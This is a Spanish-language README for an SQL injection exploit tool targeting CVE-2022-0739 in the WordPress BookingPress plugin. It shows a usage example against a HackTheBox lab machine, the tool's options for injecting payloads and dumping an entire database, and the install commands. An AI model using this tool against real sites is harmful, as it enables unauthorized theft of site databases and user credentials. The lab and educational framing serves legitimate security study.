
Exploit para WP BookingPress (< 1.0.11) basado en el POC de destr4ct.
Mi versión del exploit de BookingPress para CVE-2022-0739, basado en el POC de destr4ct — solo que más bonito.
Ejemplo de uso contra la máquina MetaTwo de HackTheBox, que aloja un WordPress con el plugin bookingpress vulnerable (versión 1.0.10).
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)
options:
-h, --help show this help message and exit
-u URL, --url URL URL of WordPress server with vulnerable plugin (http://example.domain)
-o BASENAME, --out BASENAME
Output database schema and dump in JSON format
-p PAYLOAD, --payload PAYLOAD
Payload to inject. Should start with ')'
-a, --dump-all Enables whole DB dump
-v, --verbose Enables verbose mode
-n NONCE, --nonce NONCE
Nonce that you got as unauthenticated user
-nu NONCE_URL, --nonce-url NONCE_URL
URL where nonce can be extracted (bookingprss form page)
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt
TL:DR; Solo con fines educativos, no rompas cosas que no te pertenecen o para las que no tengas permiso de pentest. Si usas este programa para fines nefastos, los dioses de la ciberseguridad podrían golpear tu computadora con un malware tan devastador que desearías haber comprado una Mac.